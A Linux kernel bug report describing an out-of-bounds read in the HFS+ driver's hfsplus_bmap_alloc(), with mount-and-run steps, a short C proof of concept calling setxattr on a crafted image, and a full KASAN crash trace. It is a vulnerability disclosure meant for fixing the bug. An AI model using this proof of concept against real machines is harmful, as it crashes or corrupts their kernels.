200285 – Out-of-bound access in hfsplus_bmap_alloc() when calling setxattr() on a corrupted hfs+ image

Bug 200285 - Out-of-bound access in hfsplus_bmap_alloc() when calling setxattr() on a corrupted hfs+ image

Summary: Out-of-bound access in hfsplus_bmap_alloc() when calling setxattr() on a corr...

Status:	NEW

Alias:	None

Product:	File System
Classification:	Unclassified
Component:	HFS/HFSPLUS (show other bugs)
Hardware:	All Linux

Importance:	P1 normal
Assignee:	fs_hfs@kernel-bugs.osdl.org

URL:
Keywords:

Depends on:
Blocks:

Reported:	2018-06-27 03:32 UTC by Wen Xu
Modified:	2018-06-27 03:32 UTC (History)
CC List:	1 user (show)

See Also:
Kernel Version:	4.18
Subsystem:
Regression:	No
Bisected commit-id:

Attachments
The (compressed) crafted image which causes crash (4.00 MB, application/octet-stream) 2018-06-27 03:32 UTC, Wen Xu	Details
Add an attachment (proposed patch, testcase, etc.)

Description Wen Xu 2018-06-27 03:32:25 UTC

Created attachment 276887 [details]
The (compressed) crafted image which causes crash

- Reproduce (4.18)
# mkdir mnt
# mount -t hfsplus 243.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

// derived from https://github.com/oracle/kernel-fuzzing/blob/master/include/mount.hh
static void activity(char *mpoint) {

  char *xattr;

  int err;

  static int buf[8192];
  memset(buf, 0, sizeof(buf));

  err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint);

  // xattr
  char buf2[113];
  memset(buf2, 0, sizeof(buf2));
  listxattr(xattr, buf2, sizeof(buf2));
  removexattr(xattr, "user.mime_type");
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE);
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE);

}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}

- Kernel message
[  177.089299] ==================================================================
[  177.090973] BUG: KASAN: slab-out-of-bounds in hfsplus_bmap_alloc+0x2f2/0x690
[  177.092451] Read of size 8 at addr ffff8801e2813170 by task poc/1408

[  177.094086] CPU: 0 PID: 1408 Comm: poc Not tainted 4.18.0-rc1+ #6
[  177.094094] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  177.094100] Call Trace:
[  177.094137]  dump_stack+0x7b/0xb5
[  177.094172]  print_address_description+0x70/0x290
[  177.094178]  kasan_report+0x291/0x390
[  177.094183]  ? hfsplus_bmap_alloc+0x2f2/0x690
[  177.094199]  __asan_load8+0x54/0x90
[  177.094205]  hfsplus_bmap_alloc+0x2f2/0x690
[  177.094210]  ? hfsplus_btree_write+0x1d0/0x1d0
[  177.094214]  ? save_stack+0xb5/0xd0
[  177.094218]  ? save_stack+0x46/0xd0
[  177.094221]  ? kasan_kmalloc+0xad/0xe0
[  177.094225]  ? __kmalloc+0x11f/0x240
[  177.094230]  ? hfsplus_find_init+0x54/0xc0
[  177.094235]  ? hfsplus_create_attr+0x10c/0x2b0
[  177.094239]  ? __hfsplus_setxattr+0x2d5/0x1160
[  177.094244]  ? hfsplus_setxattr+0x8a/0xb0
[  177.094247]  ? hfsplus_user_setxattr+0x27/0x30
[  177.094260]  ? __vfs_setxattr+0x7c/0xa0
[  177.094265]  ? __vfs_setxattr_noperm+0x8d/0x200
[  177.094269]  ? vfs_setxattr+0xb3/0xc0
[  177.094272]  ? setxattr+0x1b3/0x260
[  177.094276]  ? path_setxattr+0x134/0x170
[  177.094280]  ? __x64_sys_setxattr+0x6d/0x80
[  177.094302]  ? do_syscall_64+0x78/0x170
[  177.094318]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.094324]  hfs_btree_inc_height+0xd3/0x450
[  177.094330]  ? hfs_bnode_split+0x6b0/0x6b0
[  177.094344]  ? char2uni+0x8f/0xf0
[  177.094349]  ? char2uni+0x50/0x50
[  177.094355]  hfsplus_brec_insert+0x679/0x6c0
[  177.094360]  ? hfsplus_brec_find+0xe0/0x2e0
[  177.094366]  ? hfsplus_brec_keylen+0x130/0x130
[  177.094370]  ? __kmalloc+0x11f/0x240
[  177.094376]  hfsplus_create_attr+0x263/0x2b0
[  177.094381]  ? hfsplus_attr_exists+0x140/0x140
[  177.094390]  ? hfsplus_find_init+0x54/0xc0
[  177.094399]  ? strncmp+0x3d/0xc0
[  177.094404]  __hfsplus_setxattr+0x2d5/0x1160
[  177.094426]  ? unwind_get_return_address+0x36/0x50
[  177.094432]  ? kasan_check_write+0x14/0x20
[  177.094437]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  177.094443]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  177.094447]  ? save_stack+0x46/0xd0
[  177.094451]  ? kasan_kmalloc+0xad/0xe0
[  177.094455]  ? kmem_cache_alloc_trace+0x102/0x200
[  177.094460]  ? hfsplus_setxattr+0x4c/0xb0
[  177.094463]  ? hfsplus_user_setxattr+0x27/0x30
[  177.094467]  ? __vfs_setxattr+0x7c/0xa0
[  177.094471]  ? __vfs_setxattr_noperm+0x8d/0x200
[  177.094474]  ? vfs_setxattr+0xb3/0xc0
[  177.094478]  ? setxattr+0x1b3/0x260
[  177.094481]  ? path_setxattr+0x134/0x170
[  177.094485]  ? __x64_sys_setxattr+0x6d/0x80
[  177.094490]  ? do_syscall_64+0x78/0x170
[  177.094494]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.094499]  ? save_stack+0xb5/0xd0
[  177.094502]  ? save_stack+0x46/0xd0
[  177.094505]  ? kasan_kmalloc+0xad/0xe0
[  177.094509]  ? __kmalloc_node+0x11e/0x2e0
[  177.094522]  ? kvmalloc_node+0x31/0x80
[  177.094526]  ? setxattr+0x114/0x260
[  177.094530]  ? path_setxattr+0x134/0x170
[  177.094534]  ? __x64_sys_setxattr+0x6d/0x80
[  177.094538]  ? do_syscall_64+0x78/0x170
[  177.094542]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.094546]  ? save_stack+0xb5/0xd0
[  177.094549]  ? save_stack+0x46/0xd0
[  177.094553]  ? __kasan_slab_free+0x13c/0x1a0
[  177.094556]  ? kasan_slab_free+0xe/0x10
[  177.094560]  ? kmem_cache_free+0x89/0x1e0
[  177.094569]  ? putname+0x80/0x90
[  177.094573]  ? filename_lookup+0x191/0x280
[  177.094577]  ? kasan_unpoison_shadow+0x36/0x50
[  177.094581]  ? kasan_kmalloc+0xad/0xe0
[  177.094586]  ? kmem_cache_alloc_trace+0x102/0x200
[  177.094591]  hfsplus_setxattr+0x8a/0xb0
[  177.094596]  hfsplus_user_setxattr+0x27/0x30
[  177.094600]  __vfs_setxattr+0x7c/0xa0
[  177.094605]  __vfs_setxattr_noperm+0x8d/0x200
[  177.094609]  vfs_setxattr+0xb3/0xc0
[  177.094614]  setxattr+0x1b3/0x260
[  177.094618]  ? vfs_setxattr+0xc0/0xc0
[  177.094621]  ? filename_lookup+0x191/0x280
[  177.094625]  ? filename_parentat+0x2b0/0x2b0
[  177.094630]  ? kasan_kmalloc+0xad/0xe0
[  177.094635]  ? kasan_check_write+0x14/0x20
[  177.094657]  ? strncpy_from_user+0xa8/0x1c0
[  177.094670]  ? __mnt_is_readonly.part.13+0x23/0x30
[  177.094676]  ? __mnt_want_write+0x9d/0xb0
[  177.094681]  path_setxattr+0x134/0x170
[  177.094685]  ? setxattr+0x260/0x260
[  177.094690]  __x64_sys_setxattr+0x6d/0x80
[  177.094695]  do_syscall_64+0x78/0x170
[  177.094701]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.094720] RIP: 0033:0x7fc353f381fa
[  177.094722] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  177.094785] RSP: 002b:00007ffefddf89c8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  177.094794] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fc353f381fa
[  177.094797] RDX: 00007ffefddf8ab0 RSI: 0000000000401498 RDI: 000000000062b0c0
[  177.094799] RBP: 00007ffefddf8b30 R08: 0000000000000001 R09: 0000000000000000
[  177.094802] R10: 0000000000000071 R11: 0000000000000202 R12: 0000000000400c20
[  177.094804] R13: 00007ffefddf8c30 R14: 0000000000000000 R15: 0000000000000000

[  177.095151] Allocated by task 1408:
[  177.095876]  save_stack+0x46/0xd0
[  177.095880]  kasan_kmalloc+0xad/0xe0
[  177.095884]  __kmalloc+0x11f/0x240
[  177.095888]  __hfs_bnode_create+0xc6/0x3f0
[  177.095892]  hfsplus_bnode_find+0x1f0/0x500
[  177.095896]  hfsplus_bmap_alloc+0x296/0x690
[  177.095900]  hfs_btree_inc_height+0xd3/0x450
[  177.095904]  hfsplus_brec_insert+0x679/0x6c0
[  177.095908]  hfsplus_create_attr+0x263/0x2b0
[  177.095913]  __hfsplus_setxattr+0x2d5/0x1160
[  177.095917]  hfsplus_setxattr+0x8a/0xb0
[  177.095924]  hfsplus_user_setxattr+0x27/0x30
[  177.095928]  __vfs_setxattr+0x7c/0xa0
[  177.095932]  __vfs_setxattr_noperm+0x8d/0x200
[  177.095935]  vfs_setxattr+0xb3/0xc0
[  177.095938]  setxattr+0x1b3/0x260
[  177.095941]  path_setxattr+0x134/0x170
[  177.095945]  __x64_sys_setxattr+0x6d/0x80
[  177.095949]  do_syscall_64+0x78/0x170
[  177.095953]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[  177.096298] Freed by task 0:
[  177.096896] (stack is not available)

[  177.097952] The buggy address belongs to the object at ffff8801e2813100
                which belongs to the cache kmalloc-96 of size 96
[  177.100418] The buggy address is located 16 bytes to the right of
                96-byte region [ffff8801e2813100, ffff8801e2813160)
[  177.102812] The buggy address belongs to the page:
[  177.103793] page:ffffea00078a04c0 count:1 mapcount:0 mapping:ffff8801f6803500 index:0x0
[  177.105412] flags: 0x2ffff0000000100(slab)
[  177.106250] raw: 02ffff0000000100 dead000000000100 dead000000000200 ffff8801f6803500
[  177.107793] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000
[  177.109347] page dumped because: kasan: bad access detected

[  177.110784] Memory state around the buggy address:
[  177.111755]  ffff8801e2813000: 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc fc
[  177.113212]  ffff8801e2813080: 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc fc
[  177.114657] >ffff8801e2813100: 00 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc
[  177.116099]                                                              ^
[  177.117488]  ffff8801e2813180: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  177.118931]  ffff8801e2813200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  177.129577] ==================================================================
[  177.131051] Disabling lock debugging due to kernel taint
[  177.133614] general protection fault: 0000 [#1] SMP KASAN PTI
[  177.134841] CPU: 1 PID: 1408 Comm: poc Tainted: G    B             4.18.0-rc1+ #6
[  177.136473] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  177.138439] RIP: 0010:hfsplus_bmap_alloc+0x568/0x690
[  177.139450] Code: e0 4c 03 05 6a 64 94 01 66 45 85 ff 49 89 dc 0f 84 20 fe ff ff 44 89 eb 4c 89 85 f0 fe ff ff 4c 01 c3 48 89 df e8 28 ab de ff <0f> b6 33 4c 8b 85 f0 fe ff ff 40 80 fe ff 74 1a 31 d2 b8 80 ff ff
[  177.143261] RSP: 0018:ffff8801f1df7358 EFLAGS: 00010286
[  177.144325] RAX: 0000000000000000 RBX: 00050800000000f8 RCX: ffffffffad5b2a08
[  177.145751] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 00050800000000f8
[  177.147177] RBP: ffff8801f1df74a0 R08: 0005080000000000 R09: ffffed003dd8d499
[  177.148611] R10: 0000000000000001 R11: ffffed003dd8d498 R12: ffff8801e2813100
[  177.150034] R13: 00000000000000f8 R14: ffff8801e2813170 R15: 00000000ffffdf00
[  177.151455] FS:  00007fc354417700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000
[  177.153082] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  177.154236] CR2: 0000000002514698 CR3: 00000001f3ff6000 CR4: 00000000000006e0
[  177.155667] Call Trace:
[  177.156187]  ? hfsplus_btree_write+0x1d0/0x1d0
[  177.157129]  ? save_stack+0xb5/0xd0
[  177.157850]  ? save_stack+0x46/0xd0
[  177.158571]  ? kasan_kmalloc+0xad/0xe0
[  177.159348]  ? __kmalloc+0x11f/0x240
[  177.160085]  ? hfsplus_find_init+0x54/0xc0
[  177.160937]  ? hfsplus_create_attr+0x10c/0x2b0
[  177.161844]  ? __hfsplus_setxattr+0x2d5/0x1160
[  177.162747]  ? hfsplus_setxattr+0x8a/0xb0
[  177.163562]  ? hfsplus_user_setxattr+0x27/0x30
[  177.164485]  ? __vfs_setxattr+0x7c/0xa0
[  177.165274]  ? __vfs_setxattr_noperm+0x8d/0x200
[  177.166196]  ? vfs_setxattr+0xb3/0xc0
[  177.166945]  ? setxattr+0x1b3/0x260
[  177.167663]  ? path_setxattr+0x134/0x170
[  177.168477]  ? __x64_sys_setxattr+0x6d/0x80
[  177.169342]  ? do_syscall_64+0x78/0x170
[  177.170147]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.171206]  hfs_btree_inc_height+0xd3/0x450
[  177.172087]  ? hfs_bnode_split+0x6b0/0x6b0
[  177.172947]  ? char2uni+0x8f/0xf0
[  177.173637]  ? char2uni+0x50/0x50
[  177.174327]  hfsplus_brec_insert+0x679/0x6c0
[  177.175203]  ? hfsplus_brec_find+0xe0/0x2e0
[  177.176063]  ? hfsplus_brec_keylen+0x130/0x130
[  177.176988]  ? __kmalloc+0x11f/0x240
[  177.177727]  hfsplus_create_attr+0x263/0x2b0
[  177.178601]  ? hfsplus_attr_exists+0x140/0x140
[  177.179511]  ? hfsplus_find_init+0x54/0xc0
[  177.180370]  ? strncmp+0x3d/0xc0
[  177.181040]  __hfsplus_setxattr+0x2d5/0x1160
[  177.181928]  ? unwind_get_return_address+0x36/0x50
[  177.182904]  ? kasan_check_write+0x14/0x20
[  177.183747]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  177.184688]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  177.185870]  ? save_stack+0x46/0xd0
[  177.186591]  ? kasan_kmalloc+0xad/0xe0
[  177.187363]  ? kmem_cache_alloc_trace+0x102/0x200
[  177.188334]  ? hfsplus_setxattr+0x4c/0xb0
[  177.189156]  ? hfsplus_user_setxattr+0x27/0x30
[  177.190062]  ? __vfs_setxattr+0x7c/0xa0
[  177.190850]  ? __vfs_setxattr_noperm+0x8d/0x200
[  177.191772]  ? vfs_setxattr+0xb3/0xc0
[  177.192537]  ? setxattr+0x1b3/0x260
[  177.193259]  ? path_setxattr+0x134/0x170
[  177.194066]  ? __x64_sys_setxattr+0x6d/0x80
[  177.194923]  ? do_syscall_64+0x78/0x170
[  177.195711]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.196784]  ? save_stack+0xb5/0xd0
[  177.197503]  ? save_stack+0x46/0xd0
[  177.198221]  ? kasan_kmalloc+0xad/0xe0
[  177.198992]  ? __kmalloc_node+0x11e/0x2e0
[  177.199825]  ? kvmalloc_node+0x31/0x80
[  177.200606]  ? setxattr+0x114/0x260
[  177.201323]  ? path_setxattr+0x134/0x170
[  177.202127]  ? __x64_sys_setxattr+0x6d/0x80
[  177.202979]  ? do_syscall_64+0x78/0x170
[  177.203762]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.204828]  ? save_stack+0xb5/0xd0
[  177.205548]  ? save_stack+0x46/0xd0
[  177.206266]  ? __kasan_slab_free+0x13c/0x1a0
[  177.207139]  ? kasan_slab_free+0xe/0x10
[  177.208001]  ? kmem_cache_free+0x89/0x1e0
[  177.208854]  ? putname+0x80/0x90
[  177.209525]  ? filename_lookup+0x191/0x280
[  177.210366]  ? kasan_unpoison_shadow+0x36/0x50
[  177.211279]  ? kasan_kmalloc+0xad/0xe0
[  177.212057]  ? kmem_cache_alloc_trace+0x102/0x200
[  177.213034]  hfsplus_setxattr+0x8a/0xb0
[  177.213829]  hfsplus_user_setxattr+0x27/0x30
[  177.214709]  __vfs_setxattr+0x7c/0xa0
[  177.215470]  __vfs_setxattr_noperm+0x8d/0x200
[  177.216380]  vfs_setxattr+0xb3/0xc0
[  177.217104]  setxattr+0x1b3/0x260
[  177.217795]  ? vfs_setxattr+0xc0/0xc0
[  177.218552]  ? filename_lookup+0x191/0x280
[  177.219397]  ? filename_parentat+0x2b0/0x2b0
[  177.220285]  ? kasan_kmalloc+0xad/0xe0
[  177.221062]  ? kasan_check_write+0x14/0x20
[  177.221922]  ? strncpy_from_user+0xa8/0x1c0
[  177.222791]  ? __mnt_is_readonly.part.13+0x23/0x30
[  177.223771]  ? __mnt_want_write+0x9d/0xb0
[  177.224615]  path_setxattr+0x134/0x170
[  177.225393]  ? setxattr+0x260/0x260
[  177.226120]  __x64_sys_setxattr+0x6d/0x80
[  177.226949]  do_syscall_64+0x78/0x170
[  177.227710]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.228775] RIP: 0033:0x7fc353f381fa
[  177.229511] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  177.233310] RSP: 002b:00007ffefddf89c8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  177.234822] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fc353f381fa
[  177.236258] RDX: 00007ffefddf8ab0 RSI: 0000000000401498 RDI: 000000000062b0c0
[  177.237686] RBP: 00007ffefddf8b30 R08: 0000000000000001 R09: 0000000000000000
[  177.239108] R10: 0000000000000071 R11: 0000000000000202 R12: 0000000000400c20
[  177.240543] R13: 00007ffefddf8c30 R14: 0000000000000000 R15: 0000000000000000
[  177.241976] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  177.251777] ---[ end trace 7f5a46c7478f1295 ]---
[  177.252789] RIP: 0010:hfsplus_bmap_alloc+0x568/0x690
[  177.253803] Code: e0 4c 03 05 6a 64 94 01 66 45 85 ff 49 89 dc 0f 84 20 fe ff ff 44 89 eb 4c 89 85 f0 fe ff ff 4c 01 c3 48 89 df e8 28 ab de ff <0f> b6 33 4c 8b 85 f0 fe ff ff 40 80 fe ff 74 1a 31 d2 b8 80 ff ff
[  177.257692] RSP: 0018:ffff8801f1df7358 EFLAGS: 00010286
[  177.258764] RAX: 0000000000000000 RBX: 00050800000000f8 RCX: ffffffffad5b2a08
[  177.260236] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 00050800000000f8
[  177.261707] RBP: ffff8801f1df74a0 R08: 0005080000000000 R09: ffffed003dd8d499
[  177.263152] R10: 0000000000000001 R11: ffffed003dd8d498 R12: ffff8801e2813100
[  177.264643] R13: 00000000000000f8 R14: ffff8801e2813170 R15: 00000000ffffdf00
[  177.266095] FS:  00007fc354417700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000
[  177.267724] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  177.268944] CR2: 0000000002514698 CR3: 00000001f3ff6000 CR4: 00000000000006e0

- Reason
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/btree.c#L391
             while (len) {
			byte = data[off];
			if (byte != 0xff) {
				for (m = 0x80, i = 0; i < 8; m >>= 1, i++) {
					if (!(byte & m)) {
						idx += i;
						data[off] |= m;
						set_page_dirty(*pagep);
						kunmap(*pagep);
						tree->free_nodes--;
						mark_inode_dirty(tree->inode);
						hfs_bnode_put(node);
						return hfs_bnode_create(tree,
							idx);
					}
				}
			}
			if (++off >= PAGE_SIZE) {
				kunmap(*pagep);
				data = kmap(*++pagep);
				off = 0;
			}
			idx += 8;
			len--;
		}

In this loop, `byte = data[off];`, off is out of the boundary of the array `data`.

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.

Note You need to log in before you can comment on or make changes to this bug.